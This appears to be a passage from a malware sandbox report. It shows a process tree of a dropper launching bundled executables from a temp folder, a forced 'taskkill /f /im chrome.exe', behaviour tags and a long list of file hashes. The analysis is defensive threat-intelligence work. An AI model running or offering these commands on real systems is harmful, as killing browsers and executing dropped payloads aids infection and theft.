C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun120cc0aa73f536.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1188 -
C:\Users\Admin\AppData\Local\Temp\7zS869E7076\Sun120cc0aa73f536.exeSun120cc0aa73f536.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2024
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1254899501f5870.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1804 -
C:\Users\Admin\AppData\Local\Temp\7zS869E7076\Sun1254899501f5870.exeSun1254899501f5870.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2284
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun12bbb32b76.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1716 -
C:\Users\Admin\AppData\Local\Temp\7zS869E7076\Sun12bbb32b76.exeSun12bbb32b76.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1960
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2600 -s 4483⤵
- Loads dropped DLL
- Program crash
PID:2616
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.2MB
MD57c6b2dc2c253c2a6a3708605737aa9ae
SHA1cf4284f29f740b4925fb2902f7c3f234a5744718
SHA256b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba
SHA51219579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07
-
Filesize
8KB
MD58c9e935bccc4fac6b11920ef96927aac
SHA138bd94eb5a5ef481a1e7c5192d9f824b7a16d792
SHA256bc6dfe9ae53c745b83810c092635dee8d3a5e58fda2e91552cc5683399568c09
SHA512cfd3f54aa0d8cc53388c3fe9e663a6b89a447c38873a3ccf7d658468928c9967e5c1ae7d2f4775ceb5d9b5553c640020fc858ea609190d61df68dec0cc3f2884
-
Filesize
1.4MB
MD57908fc00709580c4e12534bcd7ef8aae
SHA1616616595f65c8fdaf1c5f24a4569e6af04e898f
SHA25655fc7e624b75a66d04ed1dfc8d6957ceb013db94e9be29e779280378011d1399
SHA5120d5a72410d628d3bf6ff9188a69f378e04184ed603a620659f4084bd8a5a392577849c5aa895706eec5213b0036d24faafb8e153b458b5f53d8da7ce636b7a00
-
Filesize
436KB
MD5f417a42407e03aa745b6eceeb4994b7c
SHA133f6be92bc9cc096c4ed5f4a27b5da7fce790e8c
SHA2567c6528ddebf48f0199d66b42f5d38452c4665638c33d918392c4cb0b4dd4f24f
SHA51205201d549682963c9a77ec644fe1d860a3b3dbc54df09d2731492ce05e67bb7a4abc80dfe561808f1faae27a9a1e7a859bd2d1df4ea08237f11325b13d7c3cb5
-
Filesize
440KB
MD5118cf2a718ebcf02996fa9ec92966386
SHA1f0214ecdcb536fe5cce74f405a698c1f8b2f2325
SHA2567047db11a44cfcd1965dcf6ac77d650f5bb9c4282bf9642614634b09f3dd003d
SHA512fe5355b6177f81149013c444c244e540d04fbb2bcd2bf3bb3ea9e8c8152c662d667a968a35b24d1310decb1a2db9ac28157cda85e2ef69efee1c9152b0f39089
-
Filesize
1.4MB
MD54a01f3a6efccd47150a97d7490fd8628
SHA1284af830ac0e558607a6a34cf6e4f6edc263aee1
SHA256e29476ee4544a426c1518728034242be3e6821f79378ae2faffedecc194c5a97
SHA5124d0e886e3227f09c177f1a9836ee65766aafc7f48458c944da1afc061106dfbbf47455e54065d22de955b44044817ac900ee9ac80b434ad73bf53262acb49519
-
Filesize
58KB
MD56955f27141379c274765a5398de24b90
SHA1b24b9f4abf2927c19cdadef94e7b4707a9b39bd5
SHA256a0d02092a2e6b4b9d6ff1f62b36aa369e7b531a5599d93113f1bb4f9c49586a0
SHA51205030e5baca8aaa2e722da289272899e266f6cc8f0c2fc6c7cecaba72682f7239322ae7d3445cc624a49dd86ef7cfe7e01286f7f21ca8b8cf8ae39d4ed348d96
-
Filesize
345KB
MD504a98fc2d6e3b11989a58b0362c5beba
SHA1b0b0128b0d30e4ba1b7da32e615230bfd6b9b3c3
SHA25693d2d436f8096a64dd84ce28da1929c343da4930d30e80ca4b1b683329284f89
SHA512541f17f1b546a861aaa9a548bd4f8b180f53131926cf76457d326ebce67d35ffa9f7af468fb0fc7d00d89e2fbf8ef30f5a2be4ac01de6cf54ce0d101b6eaf729
-
Filesize
433KB
MD50f1ef1bad121bd626d293df70f9c73f8
SHA1790d44990c576d1da37e535a447dc6b7270b4ca2
SHA256327e9994d62d8a1042f96db61359c9258ebc9c703f9a536801da79b196c221d3
SHA512b626ccadfd53383a1f18d4604b4adac6ac5a0bd010089be26dd026e4a44f565813cff3711cc9343c9112a6cbcdcff208d209fba9e94f1103746e50af83be171b
-
Filesize
89KB
MD5b7ed5241d23ac01a2e531791d5130ca2
SHA149df6413239d15e9464ed4d0d62e3d62064a45e9
SHA25698ac9097e514852804ca276aac3a319b07acf7219aef34e0d4fff6ea5b094436
SHA5121e4402c695a848bd62f172bd91eb3a4df8067c1fbc5f95dfd601d7a8c24ad81ac2e1f2e1280160087da8c8fbb72e957259661d759d8f7d9317cef3c64429a126
-
Filesize
429KB
MD5ecc773623762e2e326d7683a9758491b
SHA1ad186c867976dc5909843418853d54d4065c24ba
SHA2568f97a40b4d9cf26913ab95eec548d75a8dad5a1a24d992d047e080070282d838
SHA51240e30981f533b19123ec3d84276a28acd282c01907398ca6d67155901cfaf2c2d6355dc708d0ecfc6c21b5c671b4c3bb87eeb53183b7085474a2acd302f038a4
-
Filesize
218KB
MD5d09be1f47fd6b827c81a4812b4f7296f
SHA1028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA2560de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595
-
Filesize
54KB
MD5e6e578373c2e416289a8da55f1dc5e8e
SHA1b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA25643e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA5129df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89
-
Filesize
113KB
MD59aec524b616618b0d3d00b27b6f51da1
SHA164264300801a353db324d11738ffed876550e1d3
SHA25659a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA5120648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0
-
Filesize
647KB
MD55e279950775baae5fea04d2cc4526bcc
SHA18aef1e10031c3629512c43dd8b0b5d9060878453
SHA25697de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02
-
Filesize
69KB
MD51e0d62c34ff2e649ebc5c372065732ee
SHA1fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA5123653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61
-
Filesize
2.1MB
MD5958fe72a9957d92dfb2dd38277cf75e2
SHA1d85dc845333bc383201ef67d972ee005104ffe99
SHA25661d6193f710e2339702b38547c2a75e6102ce03d9ecaff7c2cdb59779cd50204
SHA512d9c0705b962dab9f7f6fa6024d4298141dd184b77667ffe05ae7e1a810b072f774d2d55c5935191d757e3fac9dce4038951821157747d19d527dc734e223db08